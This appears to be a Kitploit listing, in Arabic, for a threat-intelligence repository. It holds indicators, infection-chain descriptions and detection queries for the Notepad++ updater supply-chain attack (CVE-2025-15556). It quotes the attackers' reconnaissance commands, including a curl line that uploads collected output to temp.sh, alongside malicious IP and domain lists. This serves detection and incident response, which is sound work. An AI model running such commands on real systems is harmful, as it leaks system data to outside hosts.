Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
notepadpp-supply-chain-iocs — مؤشرات الاختراق (IoCs) وقواعد الكشف لهجوم سلسلة التوريد على Notepad++ (CVE-2025-15556) — Lotus Blossom APT، يونيو–ديسمبر 2025. يتضمن استعلامات Falcon LogScale وقواعد YARA/Sigma وتعيين MITRE ATT&CK. | Kitploit
أدوات/GitHubGitHub/renat0z3r0/notepadpp-supply-chain-iocs
إدارة مؤشرات الاختراق (IOC)موجزات ومجمعات التهديداتتحليل الثغرات الأمنيةالتحقيق الجنائي الرقميتحليل البرمجيات الخبيثةاستخبارات التهديداتأمن سلسلة التوريدالتعلم والتعليمالاستجابة للحوادث

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubrenat0z3r0/notepadpp-supply-chain-iocs

notepadpp-supply-chain-iocs

مؤشرات الاختراق (IoCs) وقواعد الكشف لهجوم سلسلة التوريد على Notepad++ (CVE-2025-15556) — Lotus Blossom APT، يونيو–ديسمبر 2025. يتضمن استعلامات Falcon LogScale وقواعد YARA/Sigma وتعيين MITRE ATT&CK.

عرض المستودع
120منذ 7 أشهرلم تتم المراجعة بعد

مستودع مؤشرات الاختراق لهجوم سلسلة توريد Notepad++

CVE-2025-15556 | Lotus Blossom / Raspberry Typhoon | يونيو – ديسمبر 2025

Last Updated IoC Count License: MIT MITRE ATT&CK


نظرة عامة

يحتوي هذا المستودع على مجموعة شاملة وموحّدة من مؤشرات الاختراق (IoCs) المتعلقة بـهجوم سلسلة توريد Notepad++ الذي تم الكشف عنه في 2 فبراير 2026.

بين يونيو وديسمبر 2025، قامت جهة تهديد مدعومة من الدولة الصينية باختراق البنية التحتية للاستضافة الخاصة بـ Notepad++، واختطفت آلية التحديث المدمجة (WinGUp) لتسليم مثبّتات معدّلة بشكل انتقائي إلى مستخدمين مستهدفين. استغل الهجوم غياب التحقق من التوقيعات الرقمية في المحدِّث (قبل الإصدار 8.8.9)، مما مكّن من توزيع أبواب خلفية مخصصة، وCobalt Strike Beacons، وحمولات Metasploit.

حقائق رئيسية

CVECVE-2025-15556 — تنزيل كود دون التحقق من السلامة
جهة التهديدLotus Blossom (Bilbug, Raspberry Typhoon, Thrip) / Zirconium (Violet Typhoon)
فترة النشاطيونيو 2025 – 2 ديسمبر 2025
ناقل الهجوماختراق سلسلة التوريد عبر محدِّث WinGUp التلقائي
الأهدافالقطاع الحكومي، الاتصالات، الخدمات المالية، مزودو تكنولوجيا المعلومات (الفلبين، فيتنام، السلفادور، أستراليا، شرق آسيا)
البرمجيات الخبيثةالباب الخلفي Chrysalis (مخصص)، Cobalt Strike Beacon، Metasploit Meterpreter
تم التصحيح فيNotepad++ v8.8.9+ (التحقق من الشهادة) / v8.9.1+ (التحقق من XMLDSig)

سلاسل الإصابة

حددت Kaspersky GReAT ثلاث سلاسل إصابة متميزة، يتم تدويرها شهريًا تقريبًا لتجنب الاكتشاف:

السلسلة #1 — يوليو/أغسطس 2025

GUP.exe → update.exe (NSIS) → ProShow.exe (legitimate) → exploit via "load" file
  → Metasploit downloader → Cobalt Strike Beacon
  • يستغل ثغرة قديمة في برنامج ProShow بدلاً من التحميل الجانبي لـ DLL
  • الاستطلاع: whoami && tasklist → يتم تسريبها عبر temp.sh
  • دليل العمل: %appdata%\ProShow\

السلسلة #2 — سبتمبر/أكتوبر 2025

GUP.exe → update.exe (NSIS) → script.exe (Lua interpreter) → alien.ini (compiled Lua)
  → shellcode via EnumWindowStationsW → Metasploit downloader → Cobalt Strike Beacon
  • يستخدم مفسّر Lua شرعي لتنفيذ كود shellcode مُجمَّع
  • استطلاع موسّع: whoami && tasklist && systeminfo && netstat -ano
  • دليل العمل: %appdata%\Adobe\Scripts\

السلسلة #3 — أكتوبر 2025

GUP.exe → update.exe (NSIS) → BluetoothService.exe (legitimate) → log.dll (sideloaded)
  → decrypts "BluetoothService" shellcode → Chrysalis backdoor
  • تقنية التحميل الجانبي لـ DLL كلاسيكية
  • لا يوجد استطلاع مدمج (خلافًا للسلسلتين 1 و2)
  • دليل العمل: %appdata%\Bluetooth\
  • تم العثور على Cobalt Strike Beacon مرتبط في C:\ProgramData\USOShared\
                     ┌─────────────────────────────────────────────────────────┐
                     │              COMPROMISE TIMELINE                        │
                     ├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
                     │  Jul 25 │  Aug 25 │  Sep 25 │  Oct 25 │  Nov 25 │Dec 25│
                     ├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
  Chain #1 (ProShow) │████████████████████                                    │
  Chain #2 (Lua)     │                    █████████████████████████████        │
  Chain #3 (DLL SL)  │                              ██████████████            │
  Infra access       │████████████████████████████████████████████████████████│
                     └────────────────────────────────────────────────────────┘

محتويات المستودع

الملفالوصف
notepadpp_supply_chain_iocs.csvمجموعة بيانات IoC كاملة (105 مؤشرات) مع خرائط MITRE ATT&CK

مخطط CSV

العمودالوصف
ioc_typeالنوع: ip, domain, url, sha1, sha256, filepath, filename, useragent, behavior, cve, attribution, compromise_window
ioc_valueقيمة المؤشر
chainسلسلة الإصابة (1, 2, 3, 1/2, 2/3, all, n/a)
contextوصف لما يمثله مؤشر الاختراق
sourceمصدر الاستخبارات (Kaspersky, Rapid7, CrowdStrike, Tenable, Kevin Beaumont)
riskدرجة الخطورة (CRITICAL, HIGH, MEDIUM, LOW, INFO)
mitre_techniqueمعرف تقنية MITRE ATT&CK

الاكتشاف والبحث عن التهديدات

المؤشرات ذات الأولوية (ابدأ هنا)

سلوكي — غير معتمد على مؤشرات محددة، الأعلى قيمة:

  • gup.exe يُطلق أي عملية فرعية أخرى غير مثبّت Notepad++ الشرعي الموقّع
  • gup.exe يتصل بنطاقات/عناوين IP أخرى غير notepad-plus-plus.org, github.com, release-assets.githubusercontent.com
  • إنشاء الدلائل: %appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\
  • إنشاء %localappdata%\Temp\ns.tmp\ (بيئة تشغيل NSIS — موجودة في جميع السلاسل)

شبكي — ثقة عالية:

  • حل أسماء النطاقات لـ cdncheck.it.com, safe-dns.it.com, self-dns.it.com, api.skycloudcenter.com, api.wiresguard.com
  • اتصالات بـ temp.sh (51.91.79.17) — خاصة مع رفع الملفات عبر curl
  • طلبات HTTP تحتوي على عناوين temp.sh مضمّنة في ترويسة User-Agent
  • اتصالات صادرة إلى 45.76.155.202, 45.32.144.255, 95.179.213.0, 45.77.31.210

أوامر الاستطلاع (بعد الاختراق):

cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload

استعلامات CrowdStrike Falcon LogScale

سلوكي: البحث عن العمليات الفرعية لـ GUP.exe
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])
بحث متعدد المؤشرات عبر أحداث العمليات والشبكة وDNS
#event_simpleName=/(ProcessRollup2|NetworkConnectIP4|DnsRequest)/ event_platform=Win
| case {
    // Malicious IPs
    RemoteAddressIP4=/(95\.179\.213\.0|61\.4\.102\.97|59\.110\.7\.32|124\.222\.137\.114|45\.76\.155\.202|45\.32\.144\.255|45\.77\.31\.210)/
        | iocType := "Malicious IP" | iocValue := RemoteAddressIP4 | riskScore := "HIGH";
    // Malicious Domains
    DomainName=/(api\.skycloudcenter\.com|api\.wiresguard\.com|cdncheck\.it\.com|safe-dns\.it\.com|self-dns\.it\.com|temp\.sh)/i
        | iocType := "Malicious Domain" | iocValue := DomainName | riskScore := "HIGH";
    // Suspicious filenames
    ImageFileName=/\\(BluetoothService|admin|system|loader1|loader2|s047t5g|ConsoleApplication2|3yzr31vk|uffhxpSy)\.exe$/i
        | iocType := "Suspicious Filename" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // Suspicious DLLs
    ImageFileName=/\\(log\.dll|libtcc\.dll)$/i
        | iocType := "Suspicious DLL" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // Chain-specific artifacts
    ImageFileName=/\\(alien\.ini|load)$/i
        | iocType := "Chain Artifact" | iocValue := ImageFileName | riskScore := "HIGH";
    * | iocType := null;
}
| iocType=*
| ImageFileName=/\\(?<FileName>[^\\]+)$/
| table([riskScore, iocType, iocValue, @timestamp, aid, ComputerName, FileName, ImageFileName, CommandLine, SHA256HashData, RemoteAddressIP4, DomainName], limit=5000)
كشف مثبّت NSIS (جميع السلاسل)
#event_simpleName=DirectoryCreate event_platform=Win
| FilePath=/\\ns\.tmp$/i
| FilePath=/\\Temp\\ns\.tmp$/i
| groupBy([aid, ComputerName, FilePath, ContextTimeStamp], limit=5000)

قاعدة YARA (نمط NSIS + الاستطلاع)

قاعدة YARA لمحدِّث NSIS الخبيث
تنزيل الأداة